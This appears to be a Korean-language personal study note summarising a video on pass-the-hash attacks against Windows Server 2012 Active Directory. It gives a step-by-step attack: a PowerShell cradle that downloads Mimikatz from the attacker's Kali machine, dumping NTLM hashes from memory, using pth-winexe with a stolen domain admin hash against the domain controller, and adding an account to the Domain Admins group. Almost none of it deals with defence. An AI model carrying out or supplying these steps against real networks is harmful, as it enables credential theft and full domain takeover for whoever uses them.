Passing the Hash: How to hack Windows Server 2012 - Privilege Escalation to Domain Admin

Passing the Hash: How to hack Windows Server 2012 - Privilege Escalation to Domain Admin

www.youtube.com/watch?v=SpLMuVs-qoc

 

Tool: 
remmina: rdesktop과 동일, 윈도우 원격접속도구
MimiKatz: 메모리에 저장된 ntlm Hash값을 덤프 할 수 있다.

* pth기법을 위해 NTLM HASH가 필요한 것이기 때문에 다른 해시덤프 도구를 사용해도 된다. WCE, fdump 등..

pth-winexe: ntlm 해쉬값을 가지고 원격 도메인 서버에 대한 접근 및 로그인, 명령어를 수행할 수 있다.

windows2012부터는 credential을 평문으로 저장하지 않는다. (2008, 2003은 평문으로 저장했음)

 

취약 환경: quote-unquote misconfigured 으로 인한 ntlm hash가 서버의 메모리에 남아있는 경우 (무슨 뜻이지..?)

A서버: 제한된 도메인 권한을 갖지만, 공격자에 의해 로컬어드민 계정은 획득한 상태
B서버: Domain Admins only, Secured 상태
C서버: Domain Admins only, Domain Controller

 

 

1. remmina를 이용해 A서버에 접속

2. domain administrator 계정 확인

net group /domain "domain admins" 

3. Mimikatz 파워쉘 버전을 칼리에서 다운로드

IEX (New-Object Net.WebClient).DownloadString('.....') 

4. 파워쉘을 관리자 권한 실행 후 미미카츠 스크립트 실행

PS system32> Invoke-Mimikatz 

5. 2번에서 확인된 도메인 관리자 계정(super)의 NTLM HASH 카피

6. pth를 사용하여 C서버(Domain Controller)로 명령어 수행

kali> pth-winexe -U [도메인]/[계정명]%0000000000000000000000000..32개:[카피된 NTLM HASH] //[서버아이피] [명령어] 

ipconfig로 테스트

'net group /Domain "domain admins"' 

A서버 로컬관리자 계정을 도메인 어드민 관리자 그룹에 추가 시킴

'net group "domain admins" /ADD notsecret[계정명]' 

7. 권한상승된 계정을 사용하여 B서버에 접속